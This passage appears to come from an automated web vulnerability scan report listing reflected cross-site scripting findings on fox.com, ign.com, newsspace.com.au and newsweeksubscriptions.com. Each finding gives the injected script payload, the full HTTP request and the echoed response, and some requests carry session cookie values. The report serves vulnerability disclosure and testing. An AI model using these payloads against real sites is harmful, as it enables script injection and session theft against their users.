Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|274475EC851D313D-4000014500050F53[CE]; volumeCookie=75; s_pers=%20s_v18_stack%3D%255B%255B'D%25253Dc18'%252C'1317596476851'%255D%252C%255B'D%25253Dc18'%252C'1317753575301'%255D%252C%255B'D%25253Dc18'%252C'1317756162059'%255D%255D%7C1475608962059%3B%20s_vnum%3D1320123600936%2526vn%253D3%7C1320123600936%3B%20s_invisit%3Dtrue%7C1317758115849%3B%20s_dayslastvisit%3D1317756315852%7C1412364315852%3B%20s_dayslastvisit_s%3DLess%2520than%25201%2520day%7C1317758115852%3B

Response

HTTP/1.1 404 Not Found
Server: Apache
X-FarmName: www.fox.com
X-FarmAddr: 10.96.57.117
Content-Type: text/html; charset=utf-8
Content-Length: 21803
Cache-Control: max-age=3600
Date: Tue, 04 Oct 2011 20:08:54 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
       <title>FOX Broadcastin
...[SNIP]...
<![CDATA[
s_analytics.pageName="fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combinedjs"
s_analytics.hier1="fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combinedjs" //Site Content Hierarchy
s_analytics.hier3="entertainment:fox:shows:_ui:jse8760"-alert(1)-"1dac83bc5b5combined
...[SNIP]...

1.181. http://www.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60cfa"><script>alert(1)</script>f5202b2023e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?60cfa"><script>alert(1)</script>f5202b2023e=1 HTTP/1.1
Host: www.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newscorp.com/operations/other.html#
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=1.2111014431.1317753408.1317753408.1317753408.1; __utmz=1.1317753408.1.1.utmccn=(referral)|utmcsr=newscorp.com|utmcct=/management/ndm.html|utmcmd=referral; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317753406.1317756133.2; __utmz=173446715.1317756133.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317756133746%7C1412364133746%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757933746%3B; rsi_segs=; _chartbeat2=wv9yj68rlyzfi46p.1317753412044

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 20:08:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:08:38 GMT
Content-Length: 95193
Connection: close
Vary: Accept-Encoding
Set-Cookie: freq=c-1317758914106v-4n-12mc+1317758914106mv+4mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=rivq9nyyyl63;Path=/includes
Set-Cookie: JSESSIONID=2ibcigl3g2ag2;Path=/includes
Set-Cookie: JSESSIONID=f5ip1gfp6sa;Path=/includes
Set-Cookie: JSESSIONID=oamcggqq4ah6;Path=/includes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.ign.com/?60cfa"><script>alert(1)</script>f5202b2023e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.182. http://www.ign.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7dcf"-alert(1)-"19caa501bc7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?a7dcf"-alert(1)-"19caa501bc7=1 HTTP/1.1
Host: www.ign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.newscorp.com/operations/other.html#
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a5d4238-2360-1891746812-2; optimizelyEndUserId=oeu1317753405502r0.8151182061992586; ATA=ign.131775336947702.50.23.123.106; s_vi=[CS]v1|2745A90C850101BD-40000105605A2661[CE]; __utma=1.2111014431.1317753408.1317753408.1317753408.1; __utmz=1.1317753408.1.1.utmccn=(referral)|utmcsr=newscorp.com|utmcct=/management/ndm.html|utmcmd=referral; optimizelyBuckets=%7B%7D; __utma=173446715.1859606147.1317753406.1317753406.1317756133.2; __utmz=173446715.1317756133.2.2.utmcsr=newscorp.com|utmccn=(referral)|utmcmd=referral|utmcct=/operations/other.html; s_pers=%20s_nr%3D1317753576005%7C1320345576005%3B%20s_lv%3D1317756133746%7C1412364133746%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1317757933746%3B; rsi_segs=; _chartbeat2=wv9yj68rlyzfi46p.1317753412044

Response

HTTP/1.1 200 OK
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 20:08:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 20:08:45 GMT
Content-Length: 95134
Connection: close
Vary: Accept-Encoding
Set-Cookie: freq=c-1317758923156v-8n-12mc+1317758923156mv+8mn+12wwe~0;Path=/;Domain=.ign.com
Set-Cookie: JSESSIONID=17quqprxngee6;Path=/includes
Set-Cookie: JSESSIONID=7ftgm1kdh5kke;Path=/includes
Set-Cookie: JSESSIONID=6r955ega3eltd;Path=/includes
Set-Cookie: JSESSIONID=mgkyd24htr9d;Path=/includes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script>
   if(typeof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.ign.com/?a7dcf"-alert(1)-"19caa501bc7=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.183. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c803"><script>alert(1)</script>0df4efac27e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/features.html?1c803"><script>alert(1)</script>0df4efac27e=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:54:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317765257189v-180n-12mc+1317765257189mv+180mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137148

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Game Reviews
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://www.ign.com/index/features.html?1c803"><script>alert(1)</script>0df4efac27e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.184. http://www.ign.com/index/features.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /index/features.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19b69"-alert(1)-"9a9ea4a4bdc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/features.html?19b69"-alert(1)-"9a9ea4a4bdc=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Jetty/5.1.10 (Linux/2.6.18-238.el5xen amd64 java/1.6.0_25
Content-Type: text/html;charset=UTF-8
Expires: Tue, 04 Oct 2011 21:54:21 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:21 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: freq=c-1317765260190v-184n-12mc+1317765260190mv+184mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 137085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <title>Video Game Reviews
...[SNIP]...
peof _comscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://www.ign.com/index/features.html?19b69"-alert(1)-"9a9ea4a4bdc=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.185. http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/08/15/batman-arkham-city-mr-freeze-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 1cf7b<script>alert(1)</script>d47d2b4ac26 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/08/15/batman-arkham-city-mr-freeze-trailer?1cf7b<script>alert(1)</script>d47d2b4ac26=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93459

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/08/15/batman-arkham-city-mr-freeze-trailer?1cf7b<script>alert(1)</script>d47d2b4ac26=1</div>
...[SNIP]...

1.186. http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload a799f<script>alert(1)</script>e8dd4602a2f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2?a799f<script>alert(1)</script>e8dd4602a2f=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:45 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:45 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/08/31/uncharted-3-drakes-deception-cargo-plane-demo-part-2?a799f<script>alert(1)</script>e8dd4602a2f=1</div>
...[SNIP]...

1.187. http://www.ign.com/videos/2011/09/15/rage-launch-trailer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/09/15/rage-launch-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3f414<script>alert(1)</script>1d9dc8200f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/09/15/rage-launch-trailer?3f414<script>alert(1)</script>1d9dc8200f4=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:50 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/09/15/rage-launch-trailer?3f414<script>alert(1)</script>1d9dc8200f4=1</div>
...[SNIP]...

1.188. http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ign.com
Path:   /videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 14433<script>alert(1)</script>5e2c9dc9589 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer?14433<script>alert(1)</script>5e2c9dc9589=1 HTTP/1.1
Host: www.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS) PHP/5.3.3
X-Powered-By: PHP/5.3.3
Content-Type: text/html; charset=utf-8
Expires: Tue, 04 Oct 2011 21:54:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:54:47 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 93124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"
xmlns:og="http:
...[SNIP]...
<div id="videopageurl" class="toClipboard" style="display:none">http://www.ign.com/videos/2011/09/16/battlefield-3-operation-guillotine-gameplay-trailer?14433<script>alert(1)</script>5e2c9dc9589=1</div>
...[SNIP]...

1.189. http://www.newsspace.com.au/digital [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsspace.com.au
Path:   /digital

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31334"%3bd8a0fd0d83 was submitted in the REST URL parameter 1. This input was echoed as 31334";d8a0fd0d83 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /digital31334"%3bd8a0fd0d83 HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<![CDATA[
                       $(function (){
                           $("#main_menu-digital31334";d8a0fd0d83")
                               .addClass("current")
                               .find(">
...[SNIP]...

1.190. http://www.newsspace.com.au/digital [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsspace.com.au
Path:   /digital

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf0e9"><img%20src%3da%20onerror%3dalert(1)>873c82dc86e was submitted in the REST URL parameter 1. This input was echoed as bf0e9"><img src=a onerror=alert(1)>873c82dc86e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /digitalbf0e9"><img%20src%3da%20onerror%3dalert(1)>873c82dc86e HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35382

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<div style="padding: 0px 19px 19px 19px" id="digitalbf0e9"><img src=a onerror=alert(1)>873c82dc86e_content_section">
...[SNIP]...

1.191. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.newsspace.com.au
Path:   /news.com.au

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 17ca6"><img%20src%3da%20onerror%3dalert(1)>971828b2e2b was submitted in the REST URL parameter 1. This input was echoed as 17ca6"><img src=a onerror=alert(1)>971828b2e2b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /news.com.au17ca6"><img%20src%3da%20onerror%3dalert(1)>971828b2e2b HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35394

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<div style="padding: 0px 19px 19px 19px" id="news.com.au17ca6"><img src=a onerror=alert(1)>971828b2e2b_content_section">
...[SNIP]...

1.192. http://www.newsspace.com.au/news.com.au [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.newsspace.com.au
Path:   /news.com.au

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16009"%3ba1ac7d093df was submitted in the REST URL parameter 1. This input was echoed as 16009";a1ac7d093df in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /news.com.au16009"%3ba1ac7d093df HTTP/1.1
Host: www.newsspace.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: LiteSpeed
Last-Modified: Tue, 04 Oct 2011 21:37:46 GMT
Content-Type: text/html; charset=utf-8
X-Server: http1.vega
Expires: Tue, 04 Oct 2011 21:37:46 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 04 Oct 2011 21:37:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 35298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
<meta http-equiv="Content-Type" co
...[SNIP]...
<![CDATA[
                       $(function (){
                           $("#main_menu-news.com.au16009";a1ac7d093df")
                               .addClass("current")
                               .find(">
...[SNIP]...

1.193. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2cabd<script>alert(1)</script>7f6f1f6df69 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial292cabd<script>alert(1)</script>7f6f1f6df69/index.php?off2on_login_url=/promo&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 524
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /4freetrial292cabd<script>alert(1)</script>7f6f1f6df69 is not found !</p>
...[SNIP]...

1.194. https://www.newsweeksubscriptions.com/4freetrial29/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d3789<script>alert(1)</script>41a04ebeece was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /4freetrial29/d3789<script>alert(1)</script>41a04ebeece?off2on_login_url=/promo&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:15 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 783
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /4freetrial29/d3789<script>alert(1)</script>41a04ebeece is not found !</p>
...[SNIP]...

1.195. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

